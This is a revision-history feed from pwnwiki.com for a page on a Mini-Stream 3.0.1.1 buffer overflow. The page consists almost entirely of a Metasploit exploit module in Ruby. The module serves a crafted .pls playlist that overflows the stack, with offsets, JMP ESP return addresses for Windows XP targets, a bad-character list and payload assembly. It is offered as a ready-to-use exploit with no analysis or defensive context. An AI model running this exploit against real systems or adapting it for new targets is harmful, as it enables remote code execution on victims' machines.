https://pwnwiki.com/index.php?action=history&feed=atom&title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
Mini-Stream 3.0.1.1緩衝區溢出漏洞 - Revision history
2026-04-13T09:06:38Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Mini-Stream_3.0.1.1%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=714&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> ## # $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and co..."
2021-03-27T03:24:09Z
<p>Created page with "==EXP== <pre> ## # $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and co..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
##<br />
# $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $<br />
##<br />
<br />
##<br />
# This file is part of the Metasploit Framework and may be subject to<br />
# redistribution and commercial restrictions. Please see the Metasploit<br />
# Framework web site for more information on licensing and terms of use.<br />
# http://metasploit.com/framework/<br />
##<br />
<br />
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Exploit::Remote<br />
Rank = NormalRanking<br />
<br />
include Msf::Exploit::Remote::HttpServer::HTML<br />
<br />
def initialize(info = {})<br />
super(update_info(info,<br />
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',<br />
'Description' => %q{<br />
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1<br />
By creating a specially crafted pls file, an an attacker may be able<br />
to execute arbitrary code.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'CORELAN Security Team ',<br />
'Ron Henry <rlh[at]ciphermonk.net>', # dijital1; Return address update<br />
],<br />
'Version' => '$Revision: 14155 $',<br />
'References' =><br />
[<br />
[ 'OSVDB', '61341' ],<br />
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],<br />
],<br />
'DefaultOptions' =><br />
{<br />
'EXITFUNC' => 'thread',<br />
},<br />
'Payload' =><br />
{<br />
'Space' => 3500,<br />
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",<br />
'StackAdjustment' => -3500<br />
},<br />
'Platform' => 'win',<br />
'Targets' =><br />
[<br />
[<br />
'Windows XP SP3 ENG',<br />
{<br />
'Ret' => 0x7e429353, # 0x7e429353 JMP ESP - USER32.dll<br />
'Offset' => 17417<br />
}<br />
],<br />
[<br />
'Windows XP SP2 ENG',<br />
{<br />
'Ret' => 0x7c941eed, # 0x7c941eed JMP ESP - SHELL32.dll<br />
'Offset' => 17417<br />
}<br />
]<br />
],<br />
'Privileged' => false,<br />
'DisclosureDate' => 'Dec 25 2009',<br />
'DefaultTarget' => 0))<br />
<br />
register_options(<br />
[<br />
OptString.new('URIPATH', [ true, 'The URI to use for this exploit', 'msf.pls'])<br />
], self.class)<br />
end<br />
<br />
<br />
def on_request_uri(cli, request)<br />
# Calculate the correct offset<br />
host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']<br />
host << ":#{datastore['SRVPORT']}/"<br />
offset = target['Offset'] - host.length<br />
<br />
# Construct our buffer<br />
sploit = rand_text_alpha(offset)<br />
sploit << [target.ret].pack('V')<br />
sploit << make_nops(32)<br />
sploit << @p<br />
<br />
print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...")<br />
send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})<br />
end<br />
<br />
def exploit<br />
@p = payload.encoded<br />
super<br />
end<br />
<br />
end<br />
</pre></div>
Pwnwiki